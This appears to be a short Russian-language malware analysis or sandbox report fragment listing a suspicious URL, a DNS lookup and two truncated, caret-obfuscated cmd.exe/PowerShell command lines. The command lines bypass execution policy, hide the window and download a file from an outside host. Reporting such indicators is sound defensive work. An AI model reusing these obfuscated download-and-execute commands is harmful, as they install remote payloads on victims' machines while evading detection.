Техническая информация
- http://truthforeyoue.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOWERS^h^e^LL^.^EX^e -^E^X^ecUTiONP^olIc^y^ Byp^AS^S -NoPRo^f^ILe^ ^-WINDo^w^S^tyl^E ^hIDd^En (^N^E^w-ob^Je^c^T s^ystEM.N^e^t.W^E^bCLIe^nt^).^d^own^loadf^IlE(^'http://truthforeyou...
- DNS ASK tr####oreyoue.top
- '<SYSTEM32>\cmd.exe' /C "pOWERS^h^e^LL^.^EX^e -^E^X^ecUTiONP^olIc^y^ Byp^AS^S -NoPRo^f^ILe^ ^-WINDo^w^S^tyl^E ^hIDd^En (^N^E^w-ob^Je^c^T s^ystEM.N^e^t.W^E^bCLIe^nt^).^d^own^loadf^IlE(^'http://truthforeyou...' (со скрытым окном)